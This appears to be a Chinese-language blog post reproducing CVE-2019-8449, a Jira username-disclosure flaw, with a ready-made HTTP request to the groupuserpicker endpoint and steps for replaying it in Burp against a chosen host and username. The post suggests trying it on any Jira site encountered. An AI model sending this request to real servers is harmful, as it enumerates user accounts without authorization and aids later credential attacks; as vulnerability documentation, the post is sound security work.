CVE-2019-8449

漏洞复现
发布日期:   2021-06-01

漏洞:CVE-2019-8449(jira可以显示出来用户名)

适用版本: Atlassian Jira 7.12< 受影响版本<8.4.0

大家好我是羔羊,今天和大家分享一个CVE漏洞复现

1、具体pyload:

GET /rest/api/latest/groupuserpicker?query=admin&maxResults=50&showAvatar=false HTTP/1.1
Host: www.baidu.com
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

2、漏洞复现

一般看到这种JIRA的都可以尝试去试试有没有该漏洞直接burp抓包

image-20210601111521609

首先抓个包然后放到Repeater模块

image-20210601111708766

然后直接将上面的pyload复制粘贴过去,这里Host填写你复现的网址,在query这里填写测试的用户名

然后点击GO

1、找到用户

image-20210601112522483

像这种就是找到了,就复现成功了,我们再来尝试个找不到的

2、找不到用户

image-20210601112640564

文章作者: Gao Yang
文章链接: https://gaoiyang.github.io/2021/06/01/CVE-2019-8449(jira%E6%98%BE%E7%A4%BA%E5%87%BA%E7%94%A8%E6%88%B7%E5%90%8D)/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Gao Yang !
漏洞复现
评论
  目录